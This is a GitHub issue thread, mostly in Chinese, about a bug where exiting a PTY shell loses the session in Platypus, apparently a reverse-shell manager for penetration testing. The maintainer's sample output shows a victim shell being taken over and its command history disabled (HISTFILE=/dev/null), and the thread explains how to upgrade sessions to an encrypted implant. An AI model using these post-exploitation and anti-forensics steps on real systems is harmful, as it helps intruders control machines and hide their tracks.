### ISSUE TITLE
从 PTY Shell 使用 exit 退出后的 BUG

### ISSUE THREAD

**Issue by lintstar** [WangYihang/Platypus#62]
**您好：**

当我获取到了一个会话并通过 Jump -> PTY -> Interact 进入一个交互式 Shell 

接着使用 exit 命令退出时

会出现显示 BUG 并且丢失会话

**公网 VPS 测试：**

![image](https://user-images.githubusercontent.com/71202919/127127306-2f9cb7f7-e668-41bc-9596-eb335288a186.png)

![image](https://user-images.githubusercontent.com/71202919/127127307-83f6f9b1-f6f6-472c-9ed6-eb994898f688.png)

并且会陷入未响应状态 无法退出

![image](https://user-images.githubusercontent.com/71202919/127127915-f5a89460-f0b4-458d-8fff-22ab5aff3f3f.png)

**本地 Kali 测试：**

![image](https://user-images.githubusercontent.com/71202919/127127375-78a7eae4-a6d4-440b-8a83-386d6d08822f.png)

而通过 Jump  -> Interact 直接进入一个会话 并且使用 exit 命令退出时

会正常返回 Platypus 命令界面 并且会话依旧保持

![image](https://user-images.githubusercontent.com/71202919/127127915-f5a89460-f0b4-458d-8fff-22ab5aff3f3f.png)

**Comment by WangYihang** [comment]
I will check it out soon. Thanks for reporting.

**Comment by WangYihang** [comment]
Suppose: 
* you did not change the default config file.
* The IP address of your VPS is `1.3.3.7`
* The hash of the victim machine is `21232f297a57a5a743894a0e4a801fc3`

The quickest solution is to upgrade the current reverse shell to the encrypted shell (so-called `Termite`).

```
Jump 21232f297a57a5a743894a0e4a801fc3
Upgrade 1.3.3.7:13337
Jump ee10c315eba2c75b403ea99136f5b48d
Interact
```

**Comment by WangYihang** [comment]
Besides, could you please provide the OS information about the platyus and the client? @lintstar

**Comment by WangYihang** [comment]
The expected output would be like: 
```bash
2021/07/28 14:29:43 Fire in the hole: [7670221bc9d48e52c3f622360be5feb7] tcp://1.2.3.4:4650 [🐧]
» Jump 7
2021/07/28 14:29:49 The current interactive shell is set to: [7670221bc9d48e52c3f622360be5feb7] tcp://1.2.3.4:4650 (connected at: 11 seconds ago) [🐧] [true]
(🐧) 1.2.3.4:4650 [polaris] » PTY
2021/07/28 14:29:54 spawning /bin/bash on the current client
2021/07/28 14:29:54 attcker window size: (179, 44)
2021/07/28 14:29:54 reseting client terminal...
2021/07/28 14:29:54 reseting client SHELL...
2021/07/28 14:29:54 reseting client TERM colors...
2021/07/28 14:29:54 reseting client window size...
(🐧) 1.2.3.4:4650 [polaris] » Interact 
2021/07/28 14:29:56 Interacting with [7670221bc9d48e52c3f622360be5feb7] tcp://1.2.3.4:4650 (connected at: 18 seconds ago) [🐧] [true]
2021/07/28 14:29:56 Setting attacker terminal to raw mode

 reset
 export SHELL=bash
 export TERM=xterm-256color
 stty rows 44 columns 179
 export HISTORY=
 export HISTSIZE=0
 export HISTSAVE=
 export HISTZONE=
 export HISTLOG=
 export HISTFILE=/dev/null
victim@victim $  reset

 export HISTFILESIZE=0
                      victim@victim $  export SHELL=bash
victim@victim $  export TERM=xterm-256color
victim@victim $  stty rows 44 columns 179
victim@victim $  export HISTORY=
victim@victim $  export HISTSIZE=0
victim@victim $  export HISTSAVE=
victim@victim $  export HISTZONE=
victim@victim $  export HISTLOG=
victim@victim $  export HISTFILE=/dev/null
victim@victim $  export HISTFILESIZE=0
victim@victim $ 

```

**Comment by WangYihang** [comment]
I can not reproduce your situation, please provide more information. @lintstar 
eg: 
* Platypus version
* Platypus OS version
* Victim OS version

**Comment by lintstar** [comment]
Platypus version：v1.5.0
Platypus OS version：CentOS Linux release 8.0.1905 (Core) 
Victim OS version：Kali GNU/Linux 2021.2

**Comment by lintstar** [comment]
Another question:
How to start the web service when platypus is running on the public network?
Is it running at this address: http://vpsip:7331/  ？
It seems that I can't access it.

**Comment by WangYihang** [comment]
> Another question:
> How to start the web service when platypus is running on the public network?
> Is it running at this address: http://vpsip:7331/？
> It seems that I can't access it.

You can modify the `config.yml` which will be generated automatically the first time you start platypus.
You need to change the `restful.host` from `127.0.0.1` to `0.0.0.0` then restart platypus.
Platypus's web UI does NOT provide any authentication methods (already in the TODO list) currently, so be careful to use it.

**Comment by lintstar** [comment]
Oh,thanks! 
Will the speed of using upx compression and then using the upgrade command improve?

**Comment by lintstar** [comment]
When I disconnected platypus, a strange unknown session occurred：
![image](https://user-images.githubusercontent.com/71202919/127296358-43ce32a3-4584-4ac5-8d9c-e6068310a815.png)

![image](https://user-images.githubusercontent.com/71202919/127296377-35e04ff0-afd7-4b88-9fc4-89feb02cc5ea.png)

**Comment by WangYihang** [comment]
> Oh,thanks!
> Will the speed of using upx compression and then using the `upgrade` command improve?

Yeah, there is a lot of improvement to be done. I am planning to design a `Termite` management subsystem that is able to cache the previous compiled `Termite` binaries. It will be released a few months later.

**Comment by WangYihang** [comment]
By the way, could please provide your instant messaging account (eg: WeChat) so that I can keep in close touch with you?
Or email me <wangyihanger[AT]gmail.com>.
Thank you so much for reporting this issue.
